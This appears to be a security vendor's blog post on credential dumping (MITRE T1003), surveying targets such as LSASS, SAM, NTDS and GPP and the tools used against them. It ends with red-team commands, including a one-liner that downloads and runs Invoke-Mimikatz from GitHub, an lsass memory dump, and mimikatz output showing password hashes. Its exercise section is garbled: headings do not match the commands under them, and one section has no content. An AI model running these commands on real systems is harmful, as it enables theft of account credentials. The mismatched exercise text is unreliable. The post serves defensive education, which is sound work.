In 2019, Picus Labs analyzed 48813 malware to determine tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files. Picus Labs categorized each observed TTP by utilizing the MITRE ATT&CK® framework. As a result of the present research, 445018 TTPs observed in the last year were mapped to ATT&CK to identify the top 10 most common techniques used by attackers. Our research has found that Credential Dumping was the third most prevalent ATT&CK technique used by adversaries in their malware.

Once adversaries establish initial access in a system, one of their primary objectives is finding credentials to access other resources and systems in the environment. As a mechanism to obtain account login and password information – credentials –  Credential Dumping is the third most frequently used MITRE ATT&CK technique in our list.

In this article, we review:

the fundamentals of the credential dumping technique

resources targeted by adversaries for credential dumping

its use cases by threat actors and malware

the most used OS resources for credential dumping

11 red team exercises for this technique

Introduction

After compromising a system with elevated privileges, adversaries try to dump as many credentials as possible. The Credential Dumping technique of MITRE ATT&CK framework enables adversaries to obtain account login and password information from the operating system and software. These credentials could grant a greater level of access, such as a privileged domain account, or the same credentials could be used on other assets. Adversaries use credentials gathered by this technique to:

access restricted information

access critical assets

perform lateral movement through the network by compromising other systems using the same credentials

create new accounts, perform actions, and remove the new account to clear tracks

analyze password patterns and password policy to reveal other credentials

Download the Red Report - Top Ten MITRE ATT&CK Techniques

Resources Targeted by Adversaries for Credential Dumping and Sub-techniques of the MITRE ATT&CK Framework

Unfortunately, there are many information sources targeted by attackers for dumping credentials. In the beta sub-techniques version of the MITRE ATT&CK framework, the T1003 OS Credential Dumping technique includes eight sub-techniques around information sources that include credentials. In this section, these sub-techniques and three additional resources targeted by adversaries have been explained.

T1003.001 LSASS Memory

The Local Security Authority Subsystem Service (LSASS) stores credentials of the logged in users in memory to provide seamless access to network resources without re-entering their credentials [1].

The lsass.exe process can store credentials in different forms, including reversibly encrypted plain text, Kerberos tickets, LM and NT hashes. A local administrator or SYSTEM privilege is required to interact with the lsass.exe process and dump its memory. Several methods and tools can be utilized to dump credentials in memory:

Mimikatz: Mimikatz is the most frequently used tool for credential dumping. It can extract plaintext passwords, password hashes, and kerberos tickets from memory [2]. Extracting password hashes in a memory dump file of lsass.exe process with mimikatz is shown in the “Red Team Exercises” section of this blog post.

Gsecdump: Gsecdump is a credential dumper that can obtain password hashes from Security Account Manager ( SAM ), Active Directory ( AD ) or logon sessions and LSA secrets .

ProcDump: Procdump is a command-line utility that is a part of the Microsoft Sysinternals suite [3]. Although its primary purpose is monitoring an application for CPU spikes and generating crash dumps to determine the cause of the spike, it can be used to dump the memory of a process, like lsass.exe as shown in the “Red Team Exercises” section below.

Windows Task Manager: Create Dump File feature of the Windows Task Manager can dump the memory of the lsass.exe process since Windows Vista/Server 2008. You can see how you can dump a process memory with the Windows Task Manager in the “Red Team Exercises” section of this blog post.

Comsvcs.dll: comsvcs.dll is a native Windows DLL located in the %systemroot%\system32\ directory. Comsvcs.dll has a MiniDump function to dump lsass.exe process memory to retrieve credentials. It requires SYSTEM privileges. Dumping LSASS process memory with comsvcs.dll is also shown in the “Red Team Exercises” section below.

Direct System Calls and API Unhooking: There is an increase in the malicious use of direct system calls in order to evade security product hooks [4]. The idea behind is executing the system calls directly and bypassing the Windows and Native API, so that we also bypass any user-mode hooks used by security products that might be in place [5]. Dumpert tool is an LSASS memory dumper using direct system calls and API unhooking and combines these techniques in a proof of concept code [6].

T1003.002 Security Account Manager

The SAM (Security Account Manager) database is stored as a file on the local disk and contains information on local accounts, including the username and the hashed password. The SAM file is located in %systemroot%\system32\config\SAM and is mounted on the HKEY_LOCAL_MACHINE/SAM (HKLM/SAM) registry hive. Moreover, the password hashes can be found in %systemroot%\system32\config\SYSTEM file, and backup copies can be found in %systemroot%\repair\ directory.

The SAM database stores Lan Manager ( LM ) or NT Lan Manager ( NTLM/NTHash ) hashes of the user passwords, instead of plaintext versions. While LM hash is the oldest password storage used until Windows Vista/Server 2008, NTLM hashes are used in modern Windows operating systems. Since passwords are stored in a hashed format, even if we somehow extract the information stored in the SAM database, we can't get the cleartext passwords.

Although storing hashed passwords increases password security to some extent, it cannot prevent attackers from performing high-impact attacks using the following techniques:

Offline password cracking: An offline password cracking attack is an attempt to find cleartext passwords by:

trying all possible combinations of passwords up to a given size and made up of a given character set (brute force attack)

trying passwords in a list (dictionary attack)

combining brute-force and dictionary attacks (hybrid attack)

comparing the password hash with pre-computed hash values in a table (rainbow table attack). Rainbow tables significantly reduce the time needed to obtain passwords.

John the Ripper [7] and hashcat [8] are popular tools used for password cracking.

Pass the Hash (PtH): In a pass the hash attack, the password hash is used directly for authenticating as the user, without cracking it. This technique is categorized under the Lateral Movement tactic ( T1075 Pass the Hash ) [9].

To crack password hashes and reveal cleartext credentials, we need to get the SAM file content. However, the SAM file cannot be moved or copied while Windows is running because of the exclusive filesystem lock obtained by the Windows kernel. Therefore, we cannot simply access the SAM file and extract usernames and passwords in the file. However, there are some methods to dump credentials in the SAM file, such as registry, in-memory and volume shadow copy techniques.

Registry technique: As mentioned above, the SAM file is located in %systemroot%\system32\config\SAM and is mounted on the HKEY_LOCAL_MACHINE/SAM (HKLM/SAM) registry hive. reg.exe [10] can be used to copy HKLM/SAM and HKLM/SECURITY files.

In-memory technique: The idea behind the in-memory dump of the SAM file is that it injects DLL into the LSASS system process or scans memory for specific patterns and inspects the contents of these memory pages. We reviewed this technique above.

Volume Shadow Copy technique: A new shadow copy is created in this technique. Then, the SAM file can be copied from the shadow copy instance that was created. SAM and SYSTEM files are located in the \GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\ directory. Following tools can be used to leverage this technique:

vssadmin: vssadmin is a native Windows tool that displays current volume shadow copy backups and all installed shadow copy writers and providers [11].

vssown: vssown is a visual basic script that can manage volume shadow copy. It can create and delete volume shadow copies, start and stop the volume shadow copy service, and mount a shadow copy to a given path.

wmic: wmic.exe [12] is a command-line utility to access Windows Management Instrumentation ( WMI ), which is the infrastructure for management data and operations on Windows-based operating systems [13]. You can write WMI scripts or applications to automate administrative tasks on remote computers.

Nishang: Nishang is a collection of scripts and payloads which enables usage of PowerShell for penetration testing and red teaming. Copy-VSS PowerShell script of Nishang can be used to copy the SAM file.

Since system-level access is required to extract information from the SAM database, adversaries usually try to elevate their privileges to the system user using various privilege escalation techniques.

T1003.003 NTDS

The NTDS.dit file is the Active Directory Domain Services ( AD DS ) database that contains AD data, including information about user objects, groups, and group membership. NTDS.dit database also contains the password hashes for all users in the domain.

Following tools can be used to capture NTDS.dit file:

NTDSUtil: ntdsutil.exe is a built-in Windows command-line utility located in the %systemroot%\system32\ directory. NTDSUtil can export the Active Directory database NTDS.dit on a Domain Controller. It uses Install From Media (IFM) backup functionality to create a copy of the NTDS.dit file. It requires administrator privileges.

The Volume Shadow Copy technique: NTDS.dit file can also be copied by using this technique. In this technique, a new volume shadow copy is created with the built-in vssadmin.exe tool. Then, the SAM file can be copied from the created shadow copy instance. Built-in Windows tools vssadmin.exe and diskshadow.exe can be used for this technique.

T1003.004 LSA Secrets

Local Security Authority (LSA) secrets is a storage for the user’s and system’s sensitive data used by the LSA in Windows to allow applications to run with user privileges, such as credentials for service accounts, VPNs, scheduled tasks, auto-logins and account backup services. Adversaries with SYSTEM access to a host may attempt to dump LSA secrets , which can contain a variety of different credentials, such as credentials for service accounts.

LSA secrets are included in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. reg.exe [10] can be used to copy this registry hive.

LSA secrets can also be dumped from memory. Mimikatz’s lsadump::secrets command can dump LSA secrets [2]. Prior to dumping LSA secrets with Mimikatz’s lsadump module, you may need to use token::elevate command to impersonate a SYSTEM token.

T1003.005 Cached Domain Credentials

Domain credentials are cached in the registry to provide credentials validation when a domain-joined computer cannot connect to AD DS during a user’s logon [1]. Logon information for domain accounts can be cached locally so that, if a domain controller cannot be contacted on subsequent logons, a user can still log on [14].

Cached credentials are stored in DCC2 (Domain Cached Credentials version 2), also known as mscache2 and mscash2 (Microsoft CAched haSH), hash format in Windows Vista and newer Windows versions [15]. These cached credentials do not expire, but they cannot be used for pass-the-hash attacks, so adversaries must crack the hash to recover the plaintext passwords [16].
Metasploit’s cachedump post-exploitation module ( /windows/gather/cachedump ) uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting [17]. The default setting on Windows is to store the last ten successful logins.

T1003.006 DCSync

Microsoft Directory Replication Service Remote ( MS-DRSR ) Protocol is an RPC protocol for replication and management of data in Active Directory [18]. DCSync is a Mimikatz command ( lsadump::dcsync ) that simulates the behavior of a domain controller and asks other domain controllers to synchronize a specified entry and replicate information by using the MS-DRSR [2].

T1003.007 Proc Filesystem

The proc filesystem is a pseudo-filesystem which provides an interface to kernel data structures for Linux based operating systems [19].  It is commonly mounted at /proc and can be used by processes running with root privileges to retrieve live memory from other running programs. If any of these programs store plain text or hashed passwords in memory, adversaries can extract these values.

MimiPenguin is an open source tool that can dump process memory and harvest passwords and hashes by looking for text strings and regex patterns [20].

T1003.008 /etc/passwd and /etc/shadow

Modern Linux operating systems use a /etc/passwd and /etc/shadow files to store user account information, including password hashes. /etc/shadow contains encrypted passwords as well as other information such as account or password expiration values [21]. The /etc/shadow file is readable only by the root account.

Unshadow is a Linux utility that can combine the /etc/passwd and /etc/shadow files [22]. The output of the Unshadow tool can be used by John the Ripper [7] to crack password hashes and reveal plaintext passwords.

Group Policy Preferences (GPP) in SYSVOL

Group Policy Preferences (GPP) is a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems [23]. It is a powerful tool to create domain policies with embedded credentials. However, the storage mechanism for the credentials has a vulnerability ( CVE-2014-1812 [24]) that allows an attacker to retrieve and decrypt the password stored with GPP. This vulnerability is addressed in MS14-025 [25], but this patch only prevents new policies from being created.

SYSVOL is a folder that resides on each and every domain controller within the domain [26]. It contains the domains public files that need to be accessed by clients and kept synchronized between domain controllers. All domain Group Policies are stored in \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\ . Once a new GPP is created, it will interrelate with a Group.xml file created in SYSVOL with the appropriate configuration information and AES-256 bit encrypted passwords. Since domain Group Policies are stored in SYSVOL on the domain controller, any domain user can read the policy and decrypt the stored passwords.

Following tools can be used to extract pass words from SYSVOL:

Metasploit smb_enum_gpp module: This auxiliary module ( auxiliary/scanner/smb/smb_enum_gpp ) enumerates files from target domain controllers and connects to them via SMB [27]. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES key.

Metasploit gpp module: This post-exploitation module ( windows/gather/credentials/gpp ) enumerates the victim machine's domain controller and connects to it via SMB [28]. It then looks for GPP XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key.

Gpp-Decrypt : gpp-decrypt is a ruby script that will decrypt a given GPP encrypted string [29]. When you have access to the Group.xml file, the encrypted password can be decrypted with the help of gpp-decrypt.

Credential Manager Store

Credential Manager of Windows stores your saved login credentials in an encrypted format by using the Windows Data Protection API [30]. The Credential Manager’s web credentials are login information that are stored in Windows, Edge, Internet Explorer, Skype and other apps. Credential Manager also stores Windows login credentials, which is used by (and only by) Windows services and applications to automatically log you in.

Third-party Software

Third-party software also stores credentials. There are password recovery utilities to reveal credentials stored by the web browsers (e.g., Internet Explorer, Microsoft Edge, Mozilla Firefox, Google Chrome, Apple Safari and Opera) and mail clients (e.g., Microsoft Outlook, Windows Mail and Mozilla Thunderbird).

LaZagne project is an open-source application used to retrieve passwords for the most commonly-used software [31].

Start your 14-day Free Trial: Simulate MITRE ATT&CK Techniques in minutes

Use Cases by Malware and Threat Actors

Volume Shadow Copy Method with Nishang

Copy-VSS PowerShell script of Nishang can be used to copy the SAM file [43]. This script uses VSS (The Volume Shadow Copy Service ), starts it if not running, creates a shadow copy of C:, and copies the SAM file. When the script is executed on a domain controller, ntds.dit file and SYSTEM hive will also be copied. The script must be run from an elevated shell.

First, we must import the Copy-VSS module with Import-Module PowerShell cmdlet [44].

PS C:\temp> Import-Module .\Copy-VSS.ps1

Import-Module : File C:\temp\Copy-VSS.ps1 cannot be loaded. The file

C:\temp\Copy-VSS.ps1 is not digitally signed.

As seen in the response,  the module cannot be loaded  because of the PowerShell execution policy. Execution policies determine whether you can load configuration files, such as your PowerShell profile, or run scripts [45]. And, whether scripts must be digitally signed before they are run. To see the effective execution policy for your PowerShell session, use Get-ExecutionPolicy with no parameters.

As seen in the response, the execution policy is set to restricted . According to the restricted execution policy, PowerShell doesn't load configuration files or run scripts. It is the default execution policy of Windows client computers. We can change the execution policy as unrestricted to load all configuration files and run all scripts. If you run an unsigned script that was downloaded from the internet, you're prompted for permission before it runs.

Let’s change the execution policy as unrestricted by using the Set-ExecutionPolicy cmdlet [45].

PS C:\temp> Copy-VSS -DestinationDir C:\temp
Exception calling "Create" : "Initialization failure "
At C:\temp\Copy-VSS.ps1:53 char:5
+ $id = (Get-WmiObject -list win32_shadowcopy).Create( "C:\"," Client ...
+   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo     : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WMIMethodException

Get-WmiObject : Initialization failure

Dumping Memory of lsass.exe Process with Task Manager

Open the task manager and click more details to open all processes.

Right-click on the Local Security Authority Process under Windows Processes .

Click on Create dump file .

Process memory is dumped successfully.

Dumping Memory of lsass.exe Process with Procdump

ProcDump is a command-line utility that is a part of the Microsoft Sysinternals suite [3]. It can be used to dump the memory of a process, such as lsass.exe as shown in the below command..

C:\temp> powershell -c "Set-ExecutionPolicy -ExecutionPolicy Unrestricted; Unblock-File .\Out-Minidump.ps1; . .\Out-Minidump.ps1; Get-Process 'lsass' | Out-Minidump -DumpFilePath C:\temp"


Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/30/2020  12:24 AM       50278651 lsass_664.dmp

Dumping Memory of lsass.exe Process with Comsvcs.dl

Comsvcs.dll is a native Windows DLL located in the %systemroot%\system32\ directory [47]. It has a MiniDump function to dump lsass.exe process memory to retrieve credentials. It requires SYSTEM privileges.

We need process id of lsass.exe to dump its memory with Comsvcs.dll :

C:\temp> mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"

mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
msv :
[00000003] Primary
* Username : who
* Domain   : DESKTOP-FL1FIQC
* NTLM     : f67f5e3f66efd7298be6acd32eeebccc
* SHA1     : 78637967d96d8a30553a3840f4511bdafa417999

PS C:\Users\who> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

mimikatz(powershell) # sekurlsa::logonpasswords

msv :
[00000003] Primary
* Username : who
* Domain   : DESKTOP-FL1FIQC
* NTLM     : f67f5e3f66efd7298be6acd32eeebccc
* SHA1     : 78637967d96d8a30553a3840f4511bdafa417999

[1] Archiveddocs, “Cached and Stored Credentials Technical Overview.” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11) . [Accessed: 05-May-2020]

[2] gentilkiwi, “gentilkiwi/mimikatz,” GitHub . [Online]. Available: https://github.com/gentilkiwi/mimikatz . [Accessed: 29-Jun-2020]

[3] markruss, “ProcDump - Windows Sysinternals.” [Online]. Available: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump . [Accessed: 06-May-2020]

[4] “[No title].” [Online]. Available: https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/ . [Accessed: 30-Jun-2020]

[5] Outflank, “Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR | Outflank Blog.” [Online]. Available: http://www.outflank.nl/publications . [Accessed: 30-Jun-2020]

[6] outflanknl, “outflanknl/Dumpert,” GitHub . [Online]. Available: https://github.com/outflanknl/Dumpert . [Accessed: 30-Jun-2020]

[7] “John the Ripper password cracker.” [Online]. Available: https://www.openwall.com/john/ . [Accessed: 05-May-2020]

[8] “hashcat - advanced password recovery.” [Online]. Available: https://hashcat.net/hashcat/ . [Accessed: 05-May-2020]

[9] “Pass the Hash, Technique T1075 - Enterprise | MITRE ATT&CK®.” [Online]. Available: https://attack.mitre.org/techniques/T1075/ . [Accessed: 05-May-2020]

[10] coreyp-at-msft, “reg.” [Online]. Available: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg . [Accessed: 28-Jun-2020]

[11] JasonGerend, “Vssadmin.” [Online]. Available: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/vssadmin . [Accessed: 28-Jun-2020]

[12] “[No title].” [Online]. Available: https://support.microsoft.com/en-us/help/290216/a-description-of-the-windows-management-instrumentation-wmi-command-li . [Accessed: 28-Jun-2020]

[13] stevewhims, “Windows Management Instrumentation - Win32 apps.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page . [Accessed: 28-Jun-2020]

[14] Archiveddocs, “Interactive logon: Number of previous logons to cache (in case domain controller is not available).” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj852209(v=ws.11) . [Accessed: 29-Jun-2020]

[15] “passlib.hash.msdcc2 - Windows’ Domain Cached Credentials v2 — Passlib v1.7.2 Documentation.” [Online]. Available: https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html . [Accessed: 29-Jun-2020]

[16] “Dumping and Cracking mscash - Cached Domain Credentials.” [Online]. Available: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials . [Accessed: 29-Jun-2020]

[17] “Windows Gather Credential Cache Dump,” Rapid7 . [Online]. Available: https://www.rapid7.com/db/modules/post/windows/gather/cachedump . [Accessed: 29-Jun-2020]

[18] openspecs-office, “[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol.” [Online]. Available: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47 . [Accessed: 29-Jun-2020]

[19] “proc(5) - Linux manual page.” [Online]. Available: https://man7.org/linux/man-pages/man5/proc.5.html . [Accessed: 29-Jun-2020]

[20] huntergregal, “huntergregal/mimipenguin,” GitHub . [Online]. Available: https://github.com/huntergregal/mimipenguin . [Accessed: 29-Jun-2020]

[21] “Linux Password & Shadow File Formats.” [Online]. Available: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html . [Accessed: 29-Jun-2020]

[22] Canonical, “Ubuntu Manpage: unshadow - combines passwd and shadow files.” [Online]. Available: http://manpages.ubuntu.com/manpages/xenial/man8/unshadow.8.html . [Accessed: 29-Jun-2020]

[23] Archiveddocs, “Group Policy Preferences.” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v=ws.11) . [Accessed: 28-Jun-2020]

[24] “NVD - CVE-2014-1812.” [Online]. Available: https://nvd.nist.gov/vuln/detail/CVE-2014-1812 . [Accessed: 29-Jun-2020]

[25] BetaFred, “Microsoft Security Bulletin MS14-025 - Important.” [Online]. Available: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-025 . [Accessed: 29-Jun-2020]

[26] “Active Directory Back to Basics - Sysvol - TechNet Articles - United States (English) - TechNet Wiki.” [Online]. Available: https://social.technet.microsoft.com/wiki/contents/articles/24160.active-directory-back-to-basics-sysvol.aspx . [Accessed: 29-Jun-2020]

[27] “SMB Group Policy Preference Saved Passwords Enumeration,” Rapid7 . [Online]. Available: https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_enum_gpp . [Accessed: 29-Jun-2020]

[28] “Windows Gather Group Policy Preference Saved Passwords,” Rapid7 . [Online]. Available: https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp . [Accessed: 29-Jun-2020]

[29] “gpp-decrypt.” [Online]. Available: https://tools.kali.org/password-attacks/gpp-decrypt . [Accessed: 29-Jun-2020]

[30] “How to use Credential Manager in Windows 10,” Infosec Resources . [Online]. Available: https://resources.infosecinstitute.com/category/certifications-training/securing-windows-ten/windows-10-authentication-mechanisms/credential-manager-windows-10/ . [Accessed: 30-Jun-2020]

[31] AlessandroZ, “AlessandroZ/LaZagne,” GitHub . [Online]. Available: https://github.com/AlessandroZ/LaZagne . [Accessed: 30-Jun-2020]

[32] “[No title].” [Online]. Available: https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf . [Accessed: 30-Jun-2020]

[33] “ATT&CKing ProLock Ransomware.” [Online]. Available: https://www.group-ib.com/blog/prolock . [Accessed: 29-Jun-2020]

[34] “[No title].” [Online]. Available: https://www.ibm.com/downloads/cas/OAJ4VZNJ . [Accessed: 29-Jun-2020]

[35] “Beapy: Cryptojacking Worm Hits Enterprises in China.” [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china . [Accessed: 30-Jun-2020]

[36] C. Nocturnus, “Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers.” [Online]. Available: https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers . [Accessed: 29-Jun-2020]

[37] “[No title].” [Online]. Available: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf . [Accessed: 30-Jun-2020]

[38] U. Schrott, “GreyEnergy: Updated arsenal of one of the most dangerous threat actors,” ESET Ireland , 18-Oct-2018. [Online]. Available: https://blog.eset.ie/2018/10/18/greyenergy-updated-arsenal-of-one-of-the-most-dangerous-threat-actors/ . [Accessed: 29-Jun-2020]

[39] “[Report] Double Dragon: APT41, a Dual Espionage and Cyber Crime Operation,” FireEye . [Online]. Available: content.fireeye.com . [Accessed: 30-Jun-2020]

[40] “Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments.” [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/waterbug-espionage-governments . [Accessed: 30-Jun-2020]

[41] F. Bacurio Jr and J. Salvio, “New Trickbot Plugin Harvests Email Addresses from SQL Servers, ScreenLocker Module Not for Ransom,” Fortinet Blog , 23-Apr-2018. [Online]. Available: https://www.fortinet.com/blog/threat-research/new-trickbot-plugin-harvests-email-addresses-from-sql-servers-screenlocker-module-not-for-ransom.html . [Accessed: 29-Jun-2020]

[42] Archiveddocs, “Vssadmin create shadow.” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc788055(v=ws.11) . [Accessed: 27-Jun-2020]

[43] “[No title].” [Online]. Available: https://github.com/samratashok/nishang/raw/master/Gather/Copy-VSS.ps1 . [Accessed: 28-Jun-2020]

[44] SteveL-MSFT, “Import-Module (Microsoft.PowerShell.Core).” [Online]. Available: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module . [Accessed: 28-Jun-2020]

[45] TravisEz, “Set-ExecutionPolicy (Microsoft.PowerShell.Security).” [Online]. Available: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy . [Accessed: 28-Jun-2020]

[46] PowerShellMafia, “PowerShellMafia/PowerSploit,” GitHub . [Online]. Available: https://github.com/PowerShellMafia/PowerSploit . [Accessed: 30-Jun-2020]

[47] “comsvcs | LOLBAS.” [Online]. Available: https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/ . [Accessed: 30-Jun-2020]

[48] “[No title].” [Online]. Available: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 . [Accessed: 30-Jun-2020]